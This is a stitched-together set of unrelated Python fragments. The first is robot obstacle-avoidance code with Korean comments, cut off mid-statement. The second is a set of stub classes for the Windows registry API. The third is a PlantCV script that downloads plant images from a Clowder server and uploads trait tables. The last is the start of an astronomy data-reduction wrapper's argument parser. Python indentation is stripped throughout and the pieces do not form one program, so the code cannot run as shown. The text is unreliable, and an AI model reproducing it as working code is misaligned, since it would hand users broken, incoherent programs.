self.case += self.obs_1_3_escape_and_check_obstacle(direction)
elif self.case == 2:
# case 0으로 돌아가기
self.case = 0
elif self.case == 3:
# 빨강일 경우
# 센터맞추기
self.case += self.obs_3_1_check_red_center_blue_side()
elif self.case == 4:
# 기어가는 동작, 일어서기
self.case += self.obs_4_1_crawl()
# self.red_finished = 1 # 빨강장애물은 하나밖에 없으므로
elif self.case == 5:
# case 0 으로 돌아가기
self.case = 0
def obs_0_1_check_obstacle_front(self):
# print("check_obstacle_front 함수 호출")
yellow_blue_obstacle_flag = 0
self.ip.clear()
frame = self.ip.getFrame()
success = 0
for i in range(2):
self.ip.clear()
frame = self.ip.getFrame()
# roi_1: 로봇이 직진할 떄 장애물에 부딪히지 않고 갈 수 있는 시야영역
roi_1 = frame[int(self.roi1_y_start_front):int(self.roi1_y_end), int(self.roi1_x_start):int(self.roi1_x_end)]
yellow_blue_bin = self.get_yellow_blue_bin(roi_1)
# cv2.imshow("bin", yellow_blue_bin)
# roi_1 영역에 노랑, 파랑 장애물 유무 판단
if self.ip.check_color_ratio_bin(yellow_blue_bin, self.yellow_blue_ratio):
success += 1
if success > 1:
yellow_blue_obstacle_flag = 1
# cv2.imwrite(str(self.now) + "yell_blue_obstacle.png", frame)
break
# 디버깅 용 출력 화면
# cv2.rectangle(frame, (self.roi1_x_start, self.roi1_y_start_front), (self.roi1_x_end, self.roi1_y_end), (0, 0, 255), 1)
# cv2.imshow("test", frame)
# cv2.imwrite(str(self.now) + "front", frame)
# cv2.waitKey(1)
###############################################
if yellow_blue_obstacle_flag:
# print("check_obstacle_front: 앞에 노랑, 파랑색 장애물 있음")
# cv2.imwrite(str(self.now) + "front.png", frame)
return True
else:
# print("check_obstacle_front: 없음")
return False
def obs_0_2_walk_until_obstacle(self):
# print("walk_until_obstacle 호출")
yellow_blue_obstacle_flag = 0
red_obstacle_flag = 0
self.robot.ob_startThread()
while True:
self.ip.clear()
frame = self.ip.getFrame()
# roi_1: 로봇이 직진할 떄 장애물에 부딪히지 않고 갈 수 있는 시야영역
# 고개 up이기 때문에 oblique 때 보다 roi 세로 높이 낮춤
roi_1 = frame[self.roi1_y_start_thread:self.roi1_y_end, self.roi1_x_start:self.roi1_x_end]
# roi_2: 빨강 탐색 영역
roi_2 = frame[self.roi2_y_start:self.roi2_y_end, self.roi2_x_start:self.roi2_x_end]
# roi_1 영역에 노랑, 파랑 장애물 유무 판단
yellow_blue_bin = self.get_yellow_blue_bin(roi_1)
# print("roi 내 노랑 파랑비율: ", self.ip.check_how_much_color_ratio_bin(yellow_blue_bin))
if self.ip.check_how_much_color_ratio_bin(yellow_blue_bin) > self.yellow_blue_ratio:
# success1 += 1
self.robot.ob_stopThread()
yellow_blue_obstacle_flag = 1
# roi_2 영역에 빨강 장애물 유무 판단
# print("roi 내 빨강비율: ", self.ip.check_how_much_color_ratio(roi_2, "RED"))
if self.ip.check_how_much_color_ratio(roi_2, "RED") > self.red_ratio:
self.robot.ob_stopThread()
red_obstacle_flag = 1
# 디버깅 용 출력 화면
# cv2.rectangle(frame, (self.roi1_x_start, self.roi1_y_start_thread), (self.roi1_x_end, self.roi1_y_end),
# (0, 0, 255), 2)
# cv2.rectangle(frame, (self.roi2_x_start, self.roi2_y_start), (self.roi2_x_end, self.roi2_y_end),
# (0, 255, 0), 2)
# cv2.imshow("test", frame)
# yellow_blue_bin = self.get_yellow_blue_bin(frame)
# red_bin = self.ip.getBinImage(frame, "RED")
# red_yellow_blue_bin = cv2.bitwise_or(yellow_blue_bin, red_bin)
# cv2.imshow("test2", red_yellow_blue_bin)
# cv2.imwrite(str(self.now) + "red_obstacle.png", frame)
# cv2.waitKey(1)
########################################################
# if red_obstacle_flag and not self.red_finished:
if yellow_blue_obstacle_flag:
# print("walk_until_obstacle: 파랑색 장애물 때문")
# TODO: 앞으로 몇걸음 가기 (고개를 up 한상태로 본거라 장애물이 좀 멀리 있을것이기 때문)
self.robot.ob_walk(3)
time.sleep(0.3)
return 1
elif red_obstacle_flag:
# print("walk_until_obstacle: 빨강색 장애물 때문")
# self.robot.ob_walk(7)
time.sleep(0.3)
self.robot.ob_walk(3)
self.check_red_near("thread")
return 3
else:
# print("walk_until_obstacle: 걷는중")
pass
def obs_1_1_choose_direction(self, frame):
y_start = int((self.ip.height * 0.75) // 3)
self.set_head("left") # 왼쪽 방향 보기
time.sleep(0.3)
self.ip.clear()
left_img = self.ip.getFrame()
# cv2.rectangle(left_img, (self.roiL_x_start, self.roiL_y_start), (self.roiL_x_end, self.roiL_y_end), (0, 0, 255), 2)
# cv2.imshow("test", left_img)
# cv2.imwrite(str(self.now) + "left.png", left_img)
left_img = left_img[self.roiL_y_start:self.roiL_y_end, self.roiL_x_start:self.roiL_x_end]
left_ratio = self.ip.check_how_much_color_ratio(left_img, "YELLOW")
self.set_head("right") # 오른쪽 방향 보기
time.sleep(0.3)
self.ip.clear()
right_img = self.ip.getFrame()
# cv2.rectangle(right_img, (self.roiR_x_start, self.roiR_y_start), (self.roiR_x_end, self.roiR_y_end), (0, 0, 255), 2)
# cv2.imshow("test", right_img)
# cv2.imwrite(str(self.now) + "right.png", right_img)
right_img = right_img[self.roiR_y_start:self.roiR_y_end, self.roiR_x_start:self.roiR_x_end]
right_ratio = self.ip.check_how_much_color_ratio(right_img, "YELLOW")
# self.set_head("down")
# print("choose_direction 왼쪽 노랑 비율: ", left_ratio)
# print("choose_direction 오른쪽 노랑 비율: ", right_ratio)
# left: 2, right: 3
if left_ratio > 2 and right_ratio < 1:
# 노랑이 왼쪽 o, 오른쪽 x
# print("choose_direction: 노랑이 왼쪽 o, 오른쪽 x")
return 3
elif left_ratio < 1 and right_ratio > 2:
# 노랑이 왼쪽 x, 오른쪽 o
# print("choose_direction: 노랑이 왼쪽 x, 오른쪽 o")
return 2
elif left_ratio < 1 and right_ratio < 1:
# print("choose_direction: roi 3등분 해서 장애물 없는 쪽으로")
roi_1_L = frame[int(self.ip.height // 2):self.roi1_y_end, 0:int(self.ip.width // 4)]
roi_1_R = frame[int(self.ip.height // 2):self.roi1_y_end,
self.ip.width - int(self.ip.width // 4):self.ip.width]
roi_1_L = self.get_yellow_blue_bin(roi_1_L)
roi_1_R = self.get_yellow_blue_bin(roi_1_R)
# print("choose_direction roi 왼쪽 노랑, 파랑 비율: ", self.ip.check_how_much_color_ratio_bin(roi_1_L))
# print("choose_direction roi 오른쪽 노랑, 파랑 비율: ", self.ip.check_how_much_color_ratio_bin(roi_1_R))
if abs(self.ip.check_how_much_color_ratio_bin(roi_1_L) - self.ip.check_how_much_color_ratio_bin(
roi_1_R)) < 5:
return 2
elif self.ip.check_how_much_color_ratio_bin(roi_1_L) < self.ip.check_how_much_color_ratio_bin(roi_1_R):
return | |
the Microsoft.Win32.RegistryHive enumeration.
machineName: The remote machine.
Returns: The requested registry key.
"""
pass
def OpenSubKey(self,name,*__args):
"""
OpenSubKey(self: RegistryKey,name: str,permissionCheck: RegistryKeyPermissionCheck,rights: RegistryRights) -> RegistryKey
Retrieves the specified subkey for read or read/write access,requesting the
specified access rights.
name: The name or path of the subkey to create or open.
permissionCheck: One of the enumeration values that specifies whether the key is opened for read
or read/write access.
rights: A bitwise combination of enumeration values that specifies the desired security
access.
Returns: The subkey requested,or null if the operation failed.
OpenSubKey(self: RegistryKey,name: str) -> RegistryKey
Retrieves a subkey as read-only.
name: The name or path of the subkey to open as read-only.
Returns: The subkey requested,or null if the operation failed.
OpenSubKey(self: RegistryKey,name: str,rights: RegistryRights) -> RegistryKey
OpenSubKey(self: RegistryKey,name: str,writable: bool) -> RegistryKey
Retrieves a specified subkey,and specifies whether write access is to be
applied to the key.
name: Name or path of the subkey to open.
writable: Set to true if you need write access to the key.
Returns: The subkey requested,or null if the operation failed.
OpenSubKey(self: RegistryKey,name: str,permissionCheck: RegistryKeyPermissionCheck) -> RegistryKey
Retrieves the specified subkey for read or read/write access.
name: The name or path of the subkey to create or open.
permissionCheck: One of the enumeration values that specifies whether the key is opened for read
or read/write access.
Returns: The subkey requested,or null if the operation failed.
"""
pass
def SetAccessControl(self,registrySecurity):
"""
SetAccessControl(self: RegistryKey,registrySecurity: RegistrySecurity)
Applies Windows access control security to an existing registry key.
registrySecurity: The access control security to apply to the current subkey.
"""
pass
def SetValue(self,name,value,valueKind=None):
"""
SetValue(self: RegistryKey,name: str,value: object,valueKind: RegistryValueKind)
Sets the value of a name/value pair in the registry key,using the specified
registry data type.
name: The name of the value to be stored.
value: The data to be stored.
valueKind: The registry data type to use when storing the data.
SetValue(self: RegistryKey,name: str,value: object)
Sets the specified name/value pair.
name: The name of the value to store.
value: The data to be stored.
"""
pass
def ToString(self):
"""
ToString(self: RegistryKey) -> str
Retrieves a string representation of this key.
Returns: A string representing the key. If the specified key is invalid (cannot be
found) then null is returned.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __str__(self,*args):
pass
Handle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a Microsoft.Win32.SafeHandles.SafeRegistryHandle object that represents the registry key that the current Microsoft.Win32.RegistryKey object encapsulates.
Get: Handle(self: RegistryKey) -> SafeRegistryHandle
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Retrieves the name of the key.
Get: Name(self: RegistryKey) -> str
"""
SubKeyCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Retrieves the count of subkeys of the current key.
Get: SubKeyCount(self: RegistryKey) -> int
"""
ValueCount=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Retrieves the count of values in the key.
Get: ValueCount(self: RegistryKey) -> int
"""
View=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the view that was used to create the registry key.
Get: View(self: RegistryKey) -> RegistryView
"""
class RegistryKeyPermissionCheck(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies whether security checks are performed when opening registry keys and accessing their name/value pairs.
enum RegistryKeyPermissionCheck,values: Default (0),ReadSubTree (1),ReadWriteSubTree (2)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Default=None
ReadSubTree=None
ReadWriteSubTree=None
value__=None
class RegistryOptions(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies options to use when creating a registry key.
enum (flags) RegistryOptions,values: None (0),Volatile (1)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
None=None
value__=None
Volatile=None
class RegistryValueKind(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies the data types to use when storing values in the registry,or identifies the data type of a value in the registry.
enum RegistryValueKind,values: Binary (3),DWord (4),ExpandString (2),MultiString (7),None (-1),QWord (11),String (1),Unknown (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Binary=None
DWord=None
ExpandString=None
MultiString=None
None=None
QWord=None
String=None
Unknown=None
value__=None
class RegistryValueOptions(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies optional behavior when retrieving name/value pairs from a registry key.
enum (flags) RegistryValueOptions,values: DoNotExpandEnvironmentNames (1),None (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
DoNotExpandEnvironmentNames=None
None=None
value__=None
class RegistryView(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies which registry view to target on a 64-bit operating system.
enum RegistryView,values: Default (0),Registry32 (512),Registry64 (256)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Default=None
Registry32=None
Registry64=None
value__=None
class SaveFileDialog(FileDialog):
"""
Represents a common dialog that allows the user to specify a filename to save a file as. Microsoft.Win32.SaveFileDialog cannot be used by an application that is executing under partial trust.
SaveFileDialog()
"""
def OpenFile(self):
"""
OpenFile(self: SaveFileDialog) -> Stream
Creates a read-write file stream for the filename selected by the user using
Microsoft.Win32.SaveFileDialog.
Returns: A new System.IO.Stream that contains the selected file.
"""
pass
def Reset(self):
"""
Reset(self: SaveFileDialog)
Resets all Microsoft.Win32.SaveFileDialog properties to their default values.
"""
pass
CreatePrompt=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether Microsoft.Win32.SaveFileDialog prompts the user for permission to create a file if the user specifies a file that does not exist.
Get: CreatePrompt(self: SaveFileDialog) -> bool
Set: CreatePrompt(self: SaveFileDialog)=value
"""
Options=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the Win32 common file dialog flags that are used by file dialogs for initialization.
"""
OverwritePrompt=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether Microsoft.Win32.SaveFileDialog displays a warning if the user specifies the name of a file that already exists.
Get: OverwritePrompt(self: SaveFileDialog) -> bool
Set: OverwritePrompt(self: SaveFileDialog)=value
"""
class SessionEndedEventArgs(EventArgs):
"""
Provides data for the Microsoft.Win32.SystemEvents.SessionEnded event.
SessionEndedEventArgs(reason: SessionEndReasons)
"""
@staticmethod
def __new__(self,reason):
""" __new__(cls: type,reason: SessionEndReasons) """
pass
Reason=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an identifier that indicates how the session ended.
Get: Reason(self: SessionEndedEventArgs) -> SessionEndReasons
"""
class SessionEndedEventHandler(MulticastDelegate,ICloneable,ISerializable):
"""
Represents the method that will handle the Microsoft.Win32.SystemEvents.SessionEnded event.
SessionEndedEventHandler(object: object,method: IntPtr)
"""
def BeginInvoke(self,sender,e,callback,object):
""" BeginInvoke(self: SessionEndedEventHandler,sender: object,e: SessionEndedEventArgs,callback: AsyncCallback,object: object) -> IAsyncResult """
| |
<reponame>julianpistorius/computing-pipeline<gh_stars>10-100
#!/usr/bin/env python
from __future__ import print_function
import sys
import os
import argparse
import requests
import json
import posixpath
import cv2
import numpy as np
import plantcv as pcv
# Parse command-line arguments
###########################################
def options():
"""Parse command line options.
Args:
Returns:
argparse object
Raises:
IOError: if image vis does not exist.
IOError: if image nir does not exist.
"""
parser = argparse.ArgumentParser(description="PlantCV Clowder image analysis script for the DDPSC indoor system.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
#parser.add_argument("-v", "--vis", help="Input VIS/RGB image.", required=True)
#parser.add_argument("-n", "--nir", help="Input NIR image.", required=True)
#parser.add_argument("-p", "--perspective", help="Camera perspective (side-view, top-view)", required=True)
parser.add_argument("-d", "--dataset", help="Clowder Dataset key.", required=True)
parser.add_argument("-u", "--url", help="Clowder URL.", required=True)
parser.add_argument("-U", "--username", help="Clowder username.", required=True)
parser.add_argument("-p", "--password", help="Clowder password.", required=True)
args = parser.parse_args()
# if not os.path.exists(args.vis):
# raise IOError("File does not exist: {0}".format(args.vis))
# if not os.path.exists(args.nir):
# raise IOError("File does not exist: {0}".format(args.nir))
return args
###########################################
# Main
###########################################
def main():
"""Main program.
"""
# Get options
args = options()
# Create new session
sess = requests.Session()
sess.auth = (args.username, args.password)
# Get list of files in dataset
filelist = clowder_dataset_filelist(sess, args.url, args.dataset)
# Build metadata set
metadata = get_metadata(sess, args.url, filelist)
(fields, traits) = get_traits_table()
# Process images with PlantCV
for perspective in metadata['visible/RGB'].keys():
for rotation_angle in metadata['visible/RGB'][perspective].keys():
# VIS/RGB image Clowder ID
vis_id = metadata['visible/RGB'][perspective][rotation_angle]['img_id']
# Matching NIR image Clowder ID
nir_id = ''
# Are there NIR images
if 'near-infrared' in metadata:
# Is there an NIR image with a matching camera perspective
if perspective in metadata['near-infrared']:
# Is there an NIR image with a matching rotation angle
if rotation_angle in metadata['near-infrared'][perspective]:
nir_id = metadata['near-infrared'][perspective][rotation_angle]['img_id']
if len(nir_id) == 0:
# If no NIR image ID was found, raise an error
raise StandardError("No NIR image found matching VIS image {0}".format(vis_id))
# Add metadata to traits table
traits['plant_barcode'] = metadata['visible/RGB'][perspective][rotation_angle]['content']['plant_barcode']
traits['genotype'] = metadata['visible/RGB'][perspective][rotation_angle]['content']['genotype']
traits['treatment'] = metadata['visible/RGB'][perspective][rotation_angle]['content']['treatment']
# imagedate must be in format YYYY-MM-DDTHH:MM:SS.sss e.g. "2014-06-23T16:55:57.625"
imgdate = metadata['visible/RGB'][perspective][rotation_angle]['content']['imagedate']
if imgdate.find(" ") > -1: imgdate = imgdate.replace(" ", "T")
traits['imagedate'] = imgdate
if perspective == 'side-view':
process_sv_images(sess, args.url, vis_id, nir_id, traits)
elif perspective == 'top-view':
process_tv_images(sess, args.url, vis_id, nir_id, traits)
# Save traits table
trait_list = pcv.generate_traits_list(traits)
outfile = '%s.csv' % args.dataset
generate_average_csv(outfile, fields, trait_list)
upload_file_to_clowder(sess, args.url, outfile, args.dataset, {outfile : json.dumps({'type' : 'CSV traits table'})})
os.remove(outfile)
# Utility functions for modularity between command line and extractors
###########################################
def get_traits_table():
# Compiled traits table
fields = ('entity', 'cultivar', 'treatment', 'local_datetime', 'sv_area', 'tv_area', 'hull_area',
'solidity', 'height', 'perimeter', 'access_level', 'species', 'site')
traits = {'plant_barcode' : '',
'genotype' : '',
'treatment' : '',
'imagedate' : '',
'sv_area' : [],
'tv_area' : '',
'hull_area' : [],
'solidity' : [],
'height' : [],
'perimeter' : [],
'access_level': '2',
'species': 'Sorghum bicolor',
'site': 'Danforth Plant Science Center Bellweather Phenotyping Facility'}
return (fields, traits)
def generate_traits_list(traits):
# compose the summary traits
trait_list = [ traits['plant_barcode'],
traits['genotype'],
traits['treatment'],
traits['imagedate'],
average_trait(traits['sv_area']),
traits['tv_area'],
average_trait(traits['hull_area']),
average_trait(traits['solidity']),
average_trait(traits['height']),
average_trait(traits['perimeter']),
traits['access_level'],
traits['species'],
traits['site']
]
return trait_list
def generate_average_csv(fname, fields, trait_list):
""" Generate CSV called fname with fields and trait_list """
csv = open(fname, 'w')
csv.write(','.join(map(str, fields)) + '\n')
csv.write(','.join(map(str, trait_list)) + '\n')
csv.close()
return fname
# Get list of files for a Clowder dataset
###########################################
def clowder_dataset_filelist(session, url, dataset):
"""Return a list of files for a Clowder Dataset.
Inputs:
session = requests session object
url = Clowder URL
dataset = Clowder dataset key
Returns:
ret = requests return object
:param session: requests session object
:param url: str
:param dataset: str
:return: requests return object
"""
try:
ret = session.get(posixpath.join(url, "api/datasets", dataset, "listFiles"))
except session.exceptions.RequestException as e:
print(e)
sys.exit(1)
return ret
# Get Clowder file metadata
###########################################
def clowder_file_metadata(session, url, fileid):
"""Get metadata for a file in Clowder.
Inputs:
session = requests session object
url = Clowder URL
fileid = Clowder file key
Returns:
ret = requests return object
:param session: requests session object
:param url: str
:param fileid: str
:return: requests return object
"""
try:
ret = session.get(posixpath.join(url, "api/files", fileid, "metadata.jsonld"))
except session.exceptions.RequestException as e:
print(e)
sys.exit(1)
return ret
# Build a metadata set for a dataset
###########################################
def get_metadata(session, url, filelist):
"""Build a metadata set for a Clowder dataset.
Inputs:
session = requests session object
url = Clowder URL
filelist = Clowder API response object for the datasets listFiles method
Returns:
metadata = Metadata dictionary
:param session: requests session object
:param url: str
:param filelist: requests return object
:return: metadata: dictionary
"""
metadata = {}
# Loop over the Clowder dataset image ID list
for clowder_img in filelist.json():
# Get metadata for the image from Clowder
response = clowder_file_metadata(session, url, clowder_img['id'])
# Metadata from multiple extractors may be present
for extractor in response.json():
# Find the extractor called "deprecatedapi" which refers to the API used to upload metadata
if "user_id" in extractor['agent']:
# Save a few metadata elements for convenience
camera_type = extractor['content']['camera_type']
perspective = extractor['content']['perspective']
rotation_angle = extractor['content']['rotation_angle']
# Store the image ID for later use
extractor['img_id'] = clowder_img['id']
if camera_type not in metadata:
metadata[camera_type] = {}
if perspective not in metadata[camera_type]:
metadata[camera_type][perspective] = {}
metadata[camera_type][perspective][rotation_angle] = extractor
return metadata
def serialize_color_data(list):
newlist = [float(x) for x in list]
return newlist
# Process side-view images
###########################################
def process_sv_images(session, url, vis_id, nir_id, traits, debug=None):
"""Process side-view images from Clowder.
Inputs:
session = requests session object
url = Clowder URL
vis_id = The Clowder ID of an RGB image
nir_img = The Clowder ID of an NIR grayscale image
traits = traits table (dictionary)
debug = None, print, or plot. Print = save to file, Plot = print to screen
:param session: requests session object
:param url: str
:param vis_id: str
:param nir_id: str
:param traits: dict
:param debug: str
:return traits: dict
"""
# Read VIS image from Clowder
vis_r = session.get(posixpath.join(url, "api/files", vis_id), stream=True)
img_array = np.asarray(bytearray(vis_r.content), dtype="uint8")
img = cv2.imdecode(img_array, -1)
# Read NIR image from Clowder
nir_r = session.get(posixpath.join(url, "api/files", nir_id), stream=True)
nir_array = np.asarray(bytearray(nir_r.content), dtype="uint8")
nir = cv2.imdecode(nir_array, -1)
nir_rgb = cv2.cvtColor(nir, cv2.COLOR_GRAY2BGR)
[vis_traits, nir_traits] = process_sv_images_core(vis_id, img, nir_id, nir_rgb, nir, traits, debug)
add_plantcv_metadata(session, url, vis_id, vis_traits)
add_plantcv_metadata(session, url, nir_id, nir_traits)
return traits
def process_sv_images_core(vis_id, vis_img, nir_id, nir_rgb, nir_cv2, traits, debug=None):
# Pipeline step
device = 0
# Convert RGB to HSV and extract the Saturation channel
device, s = pcv.rgb2gray_hsv(vis_img, 's', device, debug)
# Threshold the Saturation image
device, s_thresh = pcv.binary_threshold(s, 36, 255, 'light', device, debug)
# Median Filter
device, s_mblur = pcv.median_blur(s_thresh, 5, device, debug)
device, s_cnt = pcv.median_blur(s_thresh, 5, device, debug)
# Fill small objects
# device, s_fill = pcv.fill(s_mblur, s_cnt, 0, device, args.debug)
# Convert RGB to LAB and extract the Blue channel
device, b = pcv.rgb2gray_lab(vis_img, 'b', device, debug)
# Threshold the blue image
device, b_thresh = pcv.binary_threshold(b, 137, 255, 'light', device, debug)
device, b_cnt = pcv.binary_threshold(b, 137, 255, 'light', device, debug)
# Fill small objects
# device, b_fill = pcv.fill(b_thresh, b_cnt, 10, device, args.debug)
# Join the thresholded saturation and blue-yellow images
device, bs = pcv.logical_and(s_mblur, b_cnt, device, debug)
# Apply Mask (for vis images, mask_color=white)
device, masked = pcv.apply_mask(vis_img, bs, 'white', device, debug)
# Convert RGB to LAB and extract the Green-Magenta and Blue-Yellow channels
device, masked_a = pcv.rgb2gray_lab(masked, 'a', device, debug)
device, masked_b = pcv.rgb2gray_lab(masked, 'b', device, debug)
# Threshold the green-magenta and blue images
device, maskeda_thresh = pcv.binary_threshold(masked_a, 127, 255, 'dark', device, debug)
device, maskedb_thresh = pcv.binary_threshold(masked_b, 128, 255, 'light', device, debug)
# Join the thresholded saturation and blue-yellow images (OR)
device, ab = pcv.logical_or(maskeda_thresh, maskedb_thresh, device, debug)
device, ab_cnt = pcv.logical_or(maskeda_thresh, maskedb_thresh, device, debug)
# Fill small noise
device, ab_fill1 = pcv.fill(ab, ab_cnt, 200, device, debug)
# Dilate to join small objects with larger ones
device, ab_cnt1 = pcv.dilate(ab_fill1, 3, 2, device, debug)
device, ab_cnt2 = pcv.dilate(ab_fill1, 3, 2, device, debug)
# Fill dilated image mask
device, ab_cnt3 = pcv.fill(ab_cnt2, ab_cnt1, 150, device, debug)
device, masked2 = pcv.apply_mask(masked, ab_cnt3, 'white', device, debug)
# Convert RGB to LAB and extract the Green-Magenta and Blue-Yellow channels
device, masked2_a = pcv.rgb2gray_lab(masked2, 'a', device, debug)
device, masked2_b = pcv.rgb2gray_lab(masked2, 'b', device, debug)
# Threshold the green-magenta and blue images
device, masked2a_thresh = pcv.binary_threshold(masked2_a, | |
<reponame>jdmonnier/mircx_mystic
#! /usr/bin/env python
# -*- coding: iso-8859-15 -*-
import argparse, subprocess, os, glob, socket, datetime
from mircx_pipeline import log, lookup, mailfile, headers, files, summarise
import numpy as np
import matplotlib.pyplot as plt
from astropy.io import fits as pyfits
import smtplib
from contextlib import redirect_stdout
try:
from email.mime.multipart import MIMEMultipart
except ModuleNotFoundError:
from email.MIMEMultipart import MIMEMultipart
try:
from email.mime.text import MIMEText
except ModuleNotFoundError:
from email.MIMEText import MIMEText
try:
from email.mime.base import MIMEBase
except ModuleNotFoundError:
from email.MIMEBase import MIMEBase
from email import encoders
import mirc_bot as slack
class cd:
"""
Context manager for changing the current working directory
"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
#####################################################
# Description of script and parsable options
description = \
"""
description use #1:
Wrapper for mircx_reduce.py, mircx_calibrate.py,
mircx_report.py and mircx_transmission.py.
(calibrator checks can now be conducted using the
wrapper: add option --calib-cal=TRUE. NB: requires
CANDID to be installed)
description use #2:
Wrapper for mircx_reduce.py to explore different
values of ncoherent and their effect on vis SNR
and T3PHI error.
"""
epilog = \
"""
examples use #1:
mircx_redcal_wrap.py --dates=2018Oct29,2018Oct28
--ncoherent=5,10 --ncs=1,1 --nbs=4,4 --snr-threshold=2.0,2.0
NB: length of ncoherent, ncs, nbs, snr-threshold must be
equal.
examples use #2:
mircx_redcal_wrap.py --dates=2018Oct25 --ncoh-plots=TRUE
--email=<EMAIL>
"""
parser = argparse.ArgumentParser(description=description,epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter,add_help=True)
TrueFalseDefault = ['TRUE','FALSE','TRUEd']
TrueFalse = ['TRUE','FALSE']
TrueFalseOverwrite = ['TRUE','FALSE','OVERWRITE']
parser.add_argument("--raw-dir",dest="raw_dir",default='/data/CHARADATA/MIRCX',type=str,
help="directory base for the raw data paths [%(default)s]")
parser.add_argument("--red-dir",dest="red_dir",default='/data/MIRCX/reduced',type=str,
help="directory base for the reduced data paths [%(default)s]")
parser.add_argument("--dates",dest="dates",type=str,
help="comma-separated list of observation dates to be reduced [%(default)s]")
preproc = parser.add_argument_group ('(1) preproc',
'\nSet of options used to control the book-keeping'
' as well as the preproc and rts reduction steps.')
preproc.add_argument("--reduce",dest="reduce",default='TRUE',
choices=TrueFalseOverwrite,
help="(re)do the reduction process [%(default)s]")
preproc.add_argument("--ncs",dest="ncs",type=str,default='1d',
help="list of number of frame-offset for cross-spectrum [%(default)s]")
preproc.add_argument("--nbs",dest="nbs",type=str,default='4d',
help="list of number of frame-offset for bi-spectrum [%(default)s]")
preproc.add_argument ("--bbias", dest="bbias",type=str,default='TRUEd',
help="list of bools (compute the BBIAS_COEFF product [%(default)s]?)")
preproc.add_argument("--max-integration-time-preproc", dest="max_integration_time_preproc",
default='30.d',type=str,
help='maximum integration into a single file, in (s).\n'
'This apply to PREPROC, and RTS steps [%(default)s]')
oifits = parser.add_argument_group ('(2) oifits',
'\nSet of options used to control the oifits\n'
' reduction steps.')
oifits.add_argument("--ncoherent",dest="ncoherent",type=str,default='10d',
help="list of number of frames for coherent integration [%(default)s]")
